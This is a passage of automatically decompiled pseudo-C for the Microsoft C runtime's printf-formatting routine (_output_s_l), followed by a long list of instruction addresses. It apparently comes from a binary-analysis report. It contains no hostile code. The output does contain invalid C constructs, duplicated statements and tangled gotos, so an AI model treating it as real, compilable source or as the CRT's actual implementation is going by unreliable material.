    															_push(E00B7C680(__ebp - 0x40));
    															__eax =  *(__ebp - 0x2c);
    															_push( *(__ebp - 0x2c));
    															__ecx =  *(__ebp - 0x30);
    															_push( *(__ebp - 0x30));
    															__edx =  *((char*)(__ebp - 0x251));
    															_push( *((char*)(__ebp - 0x251)));
    															__eax =  *(__ebp - 0x44);
    															_push( *(__ebp - 0x44));
    															__ecx =  *(__ebp - 4);
    															_push( *(__ebp - 4));
    															__edx = __ebp - 0x2a8;
    															_push(__ebp - 0x2a8);
    															__eax =  *0xd12188; // 0xddc09d6c
    															__eax =  *__eax();
    															__esp = __esp + 0x1c;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    															__eflags =  *(__ebp - 0x10) & 0x00000080;
    															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__edx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__eax =  *0xd12194; // 0xddc09d6c
    																	__eax =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__ecx =  *((char*)(__ebp - 0x251));
    															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
    															if( *((char*)(__ebp - 0x251)) == 0x67) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																__eflags =  *(__ebp - 0x10) & 0x00000080;
    																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__eax =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__ecx =  *0xd12190; // 0xddc09d6c
    																	E00B849C0(__ecx) =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__edx =  *(__ebp - 4);
    															__eax =  *( *(__ebp - 4));
    															__eflags =  *( *(__ebp - 4)) - 0x2d;
    															if( *( *(__ebp - 4)) == 0x2d) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																__edx =  *(__ebp - 4);
    																__edx =  *(__ebp - 4) + 1;
    																__eflags = __edx;
    																 *(__ebp - 4) = __edx;
    															}
    															__eax =  *(__ebp - 4);
    															 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    															goto L190;
    														}
    														L126:
    														__ecx =  *((char*)(__ebp - 0x251));
    														__eflags = __ecx - 0x67;
    														if(__ecx != 0x67) {
    															goto L128;
    														}
    														L127:
    														 *(__ebp - 0x30) = 1;
    														goto L130;
    													}
    													L124:
    													 *(__ebp - 0x30) = 6;
    													goto L130;
    												case 6:
    													L75:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    													__eflags =  *(__ebp - 0x10) & 0x00000810;
    													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    														__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    														 *(__ebp - 0x284) = __ax;
    														__cl =  *(__ebp - 0x284);
    														 *(__ebp - 0x248) = __cl;
    														 *(__ebp - 0x24) = 1;
    													} else {
    														 *(__ebp - 0x280) = 0;
    														__edx = __ebp + 0x14;
    														__eax = E00B93D90(__ebp + 0x14);
    														 *(__ebp - 0x258) = __ax;
    														__eax =  *(__ebp - 0x258) & 0x0000ffff;
    														__ecx = __ebp - 0x248;
    														__edx = __ebp - 0x24;
    														 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    														__eflags =  *(__ebp - 0x280);
    														if( *(__ebp - 0x280) != 0) {
    															 *(__ebp - 0x28) = 1;
    														}
    													}
    													__edx = __ebp - 0x248;
    													 *(__ebp - 4) = __ebp - 0x248;
    													do {
    														L190:
    														if( *(_t623 - 0x28) != 0) {
    															goto L216;
    														}
    														goto L191;
    													} while ( *(__ebp - 0x324) > 0x37);
    													goto L72;
    												case 7:
    													L143:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 8) = 0xa;
    													goto L153;
    												case 8:
    													L108:
    													__ecx = __ebp + 0x14;
    													 *(__ebp - 0x298) = E00B93D50(__ebp + 0x14);
    													__eax = E00B97280();
    													__eflags = __eax;
    													if(__eax != 0) {
    														L118:
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    														__eflags =  *(__ebp - 0x10) & 0x00000020;
    														if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    															__edx =  *(__ebp - 0x298);
    															__eax =  *(__ebp - 0x24c);
    															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    														} else {
    															__eax =  *(__ebp - 0x298);
    															 *( *(__ebp - 0x298)) =  *(__ebp - 0x24c);
    														}
    														 *(__ebp - 0x28) = 1;
    														while(1) {
    															L190:
    															if( *(_t623 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    													}
    													L109:
    													__edx = 0;
    													__eflags = 0;
    													if(0 == 0) {
    														 *(__ebp - 0x32c) = 0;
    													} else {
    														 *(__ebp - 0x32c) = 1;
    													}
    													__eax =  *(__ebp - 0x32c);
    													 *(__ebp - 0x29c) =  *(__ebp - 0x32c);
    													__eflags =  *(__ebp - 0x29c);
    													if( *(__ebp - 0x29c) == 0) {
    														_push(L"(\"\'n\' format specifier disabled\", 0)");
    														_push(0);
    														_push(0x695);
    														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    														_push(2);
    														__eax = L00B7D760();
    														__esp = __esp + 0x14;
    														__eflags = __eax - 1;
    														if(__eax == 1) {
    															asm("int3");
    														}
    													}
    													__eflags =  *(__ebp - 0x29c);
    													if( *(__ebp - 0x29c) != 0) {
    														L117:
    														while(1) {
    															L190:
    															if( *(_t623 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    													} else {
    														L116:
    														 *((intOrPtr*)(L00B80C60(__ecx))) = 0x16;
    														__eax = E00B809F0(__ebx, __ecx, __edi, __esi, L"(\"\'n\' format specifier disabled\", 0)", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x695, 0);
    														 *(__ebp - 0x2f8) = 0xffffffff;
    														__ecx = __ebp - 0x40;
    														__eax = E00B7C650(__ecx);
    														__eax =  *(__ebp - 0x2f8);
    														goto L229;
    													}
    												case 9:
    													L151:
    													 *(__ebp - 8) = 8;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000200;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L153;
    												case 0xa:
    													L145:
    													 *(__ebp - 0x30) = 8;
    													goto L146;
    												case 0xb:
    													L89:
    													__eflags =  *(__ebp - 0x30) - 0xffffffff;
    													if( *(__ebp - 0x30) != 0xffffffff) {
    														__edx =  *(__ebp - 0x30);
    														 *(__ebp - 0x328) =  *(__ebp - 0x30);
    													} else {
    														 *(__ebp - 0x328) = 0x7fffffff;
    													}
    													__eax =  *(__ebp - 0x328);
    													 *(__ebp - 0x290) =  *(__ebp - 0x328);
    													__ecx = __ebp + 0x14;
    													 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    													__eflags =  *(__ebp - 0x10) & 0x00000810;
    													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    														L100:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__edx =  *0xd121a0; // 0xb775a0
    															 *(__ebp - 4) = __edx;
    														}
    														__eax =  *(__ebp - 4);
    														 *(__ebp - 0x28c) =  *(__ebp - 4);
    														while(1) {
    															L103:
    															__ecx =  *(__ebp - 0x290);
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															__eflags = __ecx;
    															if(__ecx == 0) {
    																break;
    															}
    															L104:
    															__eax =  *(__ebp - 0x28c);
    															__ecx =  *( *(__ebp - 0x28c));
    															__eflags = __ecx;
    															if(__ecx == 0) {
    																break;
    															}
    															L105:
    															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    														}
    														L106:
    														__eax =  *(__ebp - 0x28c);
    														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
    														__eflags = __eax;
    														 *(__ebp - 0x24) = __eax;
    														goto L107;
    													} else {
    														L93:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__eax =  *0xd121a4; // 0xb77590
    															 *(__ebp - 4) = __eax;
    														}
    														 *(__ebp - 0xc) = 1;
    														__ecx =  *(__ebp - 4);
    														 *(__ebp - 0x294) =  *(__ebp - 4);
    														while(1) {
    															L96:
    															__edx =  *(__ebp - 0x290);
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															__eflags =  *(__ebp - 0x290);
    															if( *(__ebp - 0x290) == 0) {
    																break;
    															}
    															L97:
    															__ecx =  *(__ebp - 0x294);
    															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
    															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																break;
    															}
    															L98:
    															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    														}
    														L99:
    														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    														 *(__ebp - 0x24) = __ecx;
    														L107:
    														while(1) {
    															L190:
    															if( *(_t623 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    													}
    												case 0xc:
    													L144:
    													 *(__ebp - 8) = 0xa;
    													goto L153;
    												case 0xd:
    													L147:
    													 *(__ebp - 0x260) = 0x27;
    													L148:
    													 *(__ebp - 8) = 0x10;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														 *((char*)(__ebp - 0x14)) = 0x30;
    														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    														__eflags =  *(__ebp - 0x260) + 0x51;
    														 *((char*)(__ebp - 0x13)) = __al;
    														 *(__ebp - 0x1c) = 2;
    													}
    													L153:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    													__eflags =  *(__ebp - 0x10) & 0x00008000;
    													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    														__eflags =  *(__ebp - 0x10) & 0x00001000;
    														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    															__eflags =  *(__ebp - 0x10) & 0x00000020;
    															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__edx = 0;
    																	__eflags = 0;
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = 0;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = __edx;
    																}
    															} else {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																	 *(__ebp - 0x2b4) = __edx;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__ax = __eax;
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = __edx;
    																}
    															}
    														} else {
    															__eax = __ebp + 0x14;
    															 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    															 *(__ebp - 0x2b4) = __edx;
    														}
    													} else {
    														__ecx = __ebp + 0x14;
    														 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    														 *(__ebp - 0x2b4) = __edx;
    													}
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    														L170:
    														__ecx =  *(__ebp - 0x2b8);
    														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
    														__edx =  *(__ebp - 0x2b4);
    														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
    														goto L171;
    													} else {
    														L166:
    														__eflags =  *(__ebp - 0x2b4);
    														if(__eflags > 0) {
    															goto L170;
    														}
    														L167:
    														if(__eflags < 0) {
    															L169:
    															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
    															__edx =  *(__ebp - 0x2b4);
    															asm("adc edx, 0x0");
    															__edx =  ~( *(__ebp - 0x2b4));
    															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
    															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															L171:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    															__eflags =  *(__ebp - 0x10) & 0x00008000;
    															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																__eflags =  *(__ebp - 0x10) & 0x00001000;
    																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																	__edx =  *(__ebp - 0x2c0);
    																	__eax =  *(__ebp - 0x2bc);
    																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
    																	__eflags = __eax;
    																	 *(__ebp - 0x2bc) = __eax;
    																}
    															}
    															__eflags =  *(__ebp - 0x30);
    															if( *(__ebp - 0x30) >= 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																__eflags =  *(__ebp - 0x30) - 0x200;
    																if( *(__ebp - 0x30) > 0x200) {
    																	 *(__ebp - 0x30) = 0x200;
    																}
    															} else {
    																 *(__ebp - 0x30) = 1;
    															}
    															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    															if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    																 *(__ebp - 0x1c) = 0;
    															}
    															__eax = __ebp - 0x49;
    															 *(__ebp - 4) = __ebp - 0x49;
    															while(1) {
    																L181:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L183;
    																}
    																L182:
    																 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    																__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    																if(( *(__ebp - 0x2c0) |  *(__ebp - 0x2bc)) == 0) {
    																	goto L186;
    																}
    																L183:
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__ecx =  *(__ebp - 0x2bc);
    																__edx =  *(__ebp - 0x2c0);
    																__eax = E00B855B0( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8),  *(__ebp - 0x2c0));
    																 *(__ebp - 0x2ac) = __eax;
    																__eax =  *(__ebp - 8);
    																asm("cdq");
    																__eax =  *(__ebp - 0x2bc);
    																__ecx =  *(__ebp - 0x2c0);
    																 *(__ebp - 0x2c0) = E00B85630( *(__ebp - 0x2c0),  *(__ebp - 0x2bc),  *(__ebp - 8), __edx);
    																 *(__ebp - 0x2bc) = __edx;
    																__eflags =  *(__ebp - 0x2ac) - 0x39;
    																if( *(__ebp - 0x2ac) > 0x39) {
    																	__edx =  *(__ebp - 0x2ac);
    																	__edx =  *(__ebp - 0x2ac) +  *(__ebp - 0x260);
    																	__eflags = __edx;
    																	 *(__ebp - 0x2ac) = __edx;
    																}
    																__eax =  *(__ebp - 4);
    																__cl =  *(__ebp - 0x2ac);
    																 *( *(__ebp - 4)) = __cl;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																 *(__ebp - 4) =  *(__ebp - 4) - 1;
    																L181:
    																__ecx =  *(__ebp - 0x30);
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) > 0) {
    																	goto L183;
    																}
    																goto L182;
    															}
    														}
    														L168:
    														__eflags =  *(__ebp - 0x2b8);
    														if( *(__ebp - 0x2b8) >= 0) {
    															goto L170;
    														}
    														goto L169;
    													}
    												case 0xe:
    													while(1) {
    														L190:
    														if( *(_t623 - 0x28) != 0) {
    															goto L216;
    														}
    														goto L191;
    													}
    											}
    										case 8:
    											L30:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000002;
    											goto L33;
    										case 9:
    											L31:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
    											goto L33;
    										case 0xa:
    											L29:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000001;
    											 *(__ebp - 0x10) = __ecx;
    											goto L33;
    										case 0xb:
    											L28:
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
    											goto L33;
    										case 0xc:
    											L32:
    											__ecx =  *(__ebp - 0x10);
    											__ecx =  *(__ebp - 0x10) | 0x00000008;
    											__eflags = __ecx;
    											 *(__ebp - 0x10) = __ecx;
    											goto L33;
    										case 0xd:
    											L33:
    											goto L218;
    									}
    								} else {
    									if(0 == 0) {
    										 *(_t623 - 0x314) = 0;
    									} else {
    										 *(_t623 - 0x314) = 1;
    									}
    									_t573 =  *(_t623 - 0x314);
    									 *(_t623 - 0x278) =  *(_t623 - 0x314);
    									if( *(_t623 - 0x278) == 0) {
    										_push( &M00B77C38);
    										_push(0);
    										_push(0x460);
    										_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    										_push(2);
    										_t530 = L00B7D760();
    										_t626 = _t626 + 0x14;
    										if(_t530 == 1) {
    											asm("int3");
    										}
    									}
    									L14:
    									if( *(_t623 - 0x278) != 0) {
    										goto L16;
    									} else {
    										 *((intOrPtr*)(L00B80C60(_t573))) = 0x16;
    										E00B809F0(_t558, _t573, _t621, _t622,  &M00B77C38, L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
    										 *(_t623 - 0x2f0) = 0xffffffff;
    										E00B7C650(_t623 - 0x40);
    										_t503 =  *(_t623 - 0x2f0);
    										L229:
    										return E00B805D0(_t503, _t558,  *(_t623 - 0x48) ^ _t623, _t594, _t621, _t622);
    									}
    								}
    							}
    							L219:
    							if( *(_t623 - 0x25c) == 0) {
    								L222:
    								 *(_t623 - 0x334) = 1;
    								L223:
    								_t560 =  *(_t623 - 0x334);
    								 *(_t623 - 0x2e0) =  *(_t623 - 0x334);
    								if( *(_t623 - 0x2e0) == 0) {
    									_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
    									_push(0);
    									_push(0x8f5);
    									_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    									_push(2);
    									_t508 = L00B7D760();
    									_t626 = _t626 + 0x14;
    									if(_t508 == 1) {
    										asm("int3");
    									}
    								}
    								if( *(_t623 - 0x2e0) != 0) {
    									 *(_t623 - 0x300) =  *(_t623 - 0x24c);
    									E00B7C650(_t623 - 0x40);
    									_t503 =  *(_t623 - 0x300);
    								} else {
    									 *((intOrPtr*)(L00B80C60(_t560))) = 0x16;
    									E00B809F0(_t558, _t560, _t621, _t622, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
    									 *(_t623 - 0x2fc) = 0xffffffff;
    									E00B7C650(_t623 - 0x40);
    									_t503 =  *(_t623 - 0x2fc);
    								}
    								goto L229;
    							}
    							L220:
    							if( *(_t623 - 0x25c) == 7) {
    								goto L222;
    							}
    							L221:
    							 *(_t623 - 0x334) = 0;
    							goto L223;
    						}
    					}
    					L82:
    					_t593 =  *0xd121a0; // 0xb775a0
    					 *(_t623 - 4) = _t593;
    					_t497 = E00B805E0( *(_t623 - 4));
    					_t626 = _t626 + 4;
    					 *(_t623 - 0x24) = _t497;
    					goto L86;
    				}
    			}


















    0x00b95295
    0x00b95295
    0x00b95295
    0x00b95299
    0x00b9529e
    0x00b952a1
    0x00b952ae
    0x00000000
    0x00000000
    0x00b952b0
    0x00b952b0
    0x00b952ba
    0x00b952d6
    0x00b952d9
    0x00b952df
    0x00b95307
    0x00b9530e
    0x00b95314
    0x00b95317
    0x00b9531a
    0x00b95320
    0x00b95323
    0x00b952e1
    0x00b952e1
    0x00b952e7
    0x00b952ea
    0x00b952ed
    0x00b952f3
    0x00b952f6
    0x00b952f9
    0x00b952fb
    0x00b952fe
    0x00b952fe
    0x00b95326
    0x00b959f2
    0x00b959f2
    0x00b959f6
    0x00000000
    0x00000000
    0x00b959fc
    0x00b95a02
    0x00b95a0c
    0x00b95a21
    0x00b95a36
    0x00b95a38
    0x00b95a3c
    0x00b95a3c
    0x00b95a23
    0x00b95a23
    0x00b95a27
    0x00b95a27
    0x00b95a0e
    0x00b95a0e
    0x00b95a12
    0x00b95a12
    0x00b95a0c
    0x00b95a4c
    0x00b95a58
    0x00b95a6e
    0x00b95a73
    0x00b95a73
    0x00b95a89
    0x00b95a8e
    0x00b95a97
    0x00b95a9f
    0x00b95ab5
    0x00b95aba
    0x00b95aba
    0x00b95a9f
    0x00b95ac1
    0x00b95b95
    0x00b95ba8
    0x00b95bad
    0x00000000
    0x00b95ac7
    0x00b95ac7
    0x00b95acb
    0x00000000
    0x00000000
    0x00b95ad1
    0x00b95ad1
    0x00b95ade
    0x00b95ae7
    0x00b95aed
    0x00b95aed
    0x00b95afc
    0x00b95b04
    0x00000000
    0x00000000
    0x00b95b0a
    0x00b95b13
    0x00b95b32
    0x00b95b37
    0x00b95b3a
    0x00b95b49
    0x00b95b56
    0x00b95b61
    0x00b95b61
    0x00000000
    0x00b95b61
    0x00b95b58
    0x00b95b5f
    0x00b95b6d
    0x00b95b86
    0x00b95b8b
    0x00000000
    0x00b95b8b
    0x00000000
    0x00b95b5f
    0x00b95b93
    0x00b95bb0
    0x00b95bb7
    0x00b95bbf
    0x00b95bd5
    0x00b95bda
    0x00b95bda
    0x00b95bbf
    0x00b95bb7
    0x00b95bdd
    0x00b95be1
    0x00b95be9
    0x00b95bee
    0x00b95bf1
    0x00b95bf1
    0x00b95bf8
    0x00b95bf8
    0x00b94ccf
    0x00b94cd5
    0x00b94ce2
    0x00b94ce7
    0x00000000
    0x00b94cfa
    0x00b94d04
    0x00b94d2b
    0x00b94d12
    0x00b94d23
    0x00b94d23
    0x00b94d04
    0x00b94d35
    0x00b94d3b
    0x00b94d47
    0x00b94d4a
    0x00b94d58
    0x00b94d5b
    0x00b94d68
    0x00b94e0d
    0x00b94e13
    0x00b94e20
    0x00000000
    0x00000000
    0x00b94e26
    0x00b94e2c
    0x00000000
    0x00b94e33
    0x00b94e33
    0x00b94e4b
    0x00b94e50
    0x00b94e53
    0x00b94e55
    0x00b94f0f
    0x00b94f22
    0x00b94f27
    0x00000000
    0x00b94e5b
    0x00b94e6e
    0x00b94e73
    0x00b94e79
    0x00b94e7b
    0x00b94e84
    0x00b94e84
    0x00b94e87
    0x00b94e93
    0x00b94e97
    0x00b94e9d
    0x00b94e9f
    0x00b94ea4
    0x00b94ea6
    0x00b94eab
    0x00b94eb0
    0x00b94eb2
    0x00b94eb7
    0x00b94eba
    0x00b94ebd
    0x00b94ebf
    0x00b94ebf
    0x00b94ebd
    0x00b94ec0
    0x00b94ec0
    0x00b94ec7
    0x00000000
    0x00b94ec9
    0x00b94ece
    0x00b94eea
    0x00b94ef2
    0x00b94eff
    0x00b94f04
    0x00000000
    0x00b94f04
    0x00b94ec7
    0x00000000
    0x00b94f2f
    0x00b94f2f
    0x00b94f36
    0x00b94f39
    0x00b94f3c
    0x00b94f3f
    0x00b94f42
    0x00b94f45
    0x00b94f48
    0x00b94f4f
    0x00b94f56
    0x00000000
    0x00000000
    0x00b94f62
    0x00b94f62
    0x00b94f69
    0x00b94f75
    0x00b94f78
    0x00b94f7e
    0x00b94f85
    0x00000000
    0x00000000
    0x00b94f87
    0x00b94f87
    0x00b94f8d
    0x00b94f8d
    0x00b94f94
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b94fd7
    0x00b94fd7
    0x00b94fde
    0x00b94fe1
    0x00b9500b
    0x00b9500e
    0x00b9500e
    0x00b95011
    0x00b95018
    0x00b95018
    0x00b9501c
    0x00b94fe3
    0x00b94fe3
    0x00b94fef
    0x00b94ff2
    0x00b94ff6
    0x00b94ff8
    0x00b94ffb
    0x00b94ffb
    0x00b94ffe
    0x00b95004
    0x00b95006
    0x00b95006
    0x00b95009
    0x00000000
    0x00000000
    0x00b95024
    0x00b95024
    0x00000000
    0x00000000
    0x00b95030
    0x00b95030
    0x00b95037
    0x00b9503a
    0x00b9505a
    0x00b9505d
    0x00b9505d
    0x00b95067
    0x00b95067
    0x00b9506b
    0x00b9503c
    0x00b9503c
    0x00b95048
    0x00b9504b
    0x00b9504f
    0x00b95051
    0x00b95051
    0x00b95058
    0x00000000
    0x00000000
    0x00b95073
    0x00b95073
    0x00b9507a
    0x00b95086
    0x00b95089
    0x00b9508f
    0x00b95096
    0x00b951a9
    0x00000000
    0x00b951a9
    0x00b9509c
    0x00b9509c
    0x00b950a2
    0x00b950a2
    0x00b950a9
    0x00000000
    0x00b950df
    0x00b950df
    0x00b950e2
    0x00b950e5
    0x00b950e8
    0x00b95110
    0x00b95110
    0x00b95113
    0x00b95116
    0x00b95119
    0x00b9513e
    0x00b9513e
    0x00b95141
    0x00b95144
    0x00b95147
    0x00b95180
    0x00b95191
    0x00000000
    0x00b95191
    0x00b95149
    0x00b95149
    0x00b9514c
    0x00b9514f
    0x00b95152
    0x00000000
    0x00000000
    0x00b95154
    0x00b95154
    0x00b95157
    0x00b9515a
    0x00b9515d
    0x00000000
    0x00000000
    0x00b9515f
    0x00b9515f
    0x00b95162
    0x00b95165
    0x00b95168
    0x00000000
    0x00000000
    0x00b9516a
    0x00b9516a
    0x00b9516d
    0x00b95170
    0x00b95173
    0x00000000
    0x00000000
    0x00b95175
    0x00b95175
    0x00b95178
    0x00b9517b
    0x00b9517e
    0x00b95182
    0x00000000
    0x00b95182
    0x00000000
    0x00b9517e
    0x00b9511b
    0x00b9511b
    0x00b9511e
    0x00b95122
    0x00b95125
    0x00000000
    0x00b95127
    0x00b9512a
    0x00b9512d
    0x00b95130
    0x00b95133
    0x00b95139
    0x00000000
    0x00b95139
    0x00b95125
    0x00b950ea
    0x00b950ea
    0x00b950ed
    0x00b950f1
    0x00b950f4
    0x00000000
    0x00b950f6
    0x00b950f9
    0x00b950fc
    0x00b950ff
    0x00b95102
    0x00b95108
    0x00000000
    0x00b95108
    0x00000000
    0x00b95193
    0x00b95196
    0x00b95199
    0x00000000
    0x00000000
    0x00b950b0
    0x00b950b0
    0x00b950b3
    0x00b950b6
    0x00b950b9
    0x00b950d1
    0x00b950d4
    0x00b950d4
    0x00b950d7
    0x00b950bb
    0x00b950be
    0x00b950c1
    0x00b950c7
    0x00b950cc
    0x00b950cc
    0x00000000
    0x00000000
    0x00b9519e
    0x00b9519e
    0x00b951a1
    0x00b951a1
    0x00b951a6
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00b951ae
    0x00b951ae
    0x00b951b5
    0x00b951c1
    0x00b951c4
    0x00b951ca
    0x00b951d1
    0x00000000
    0x00b959f2
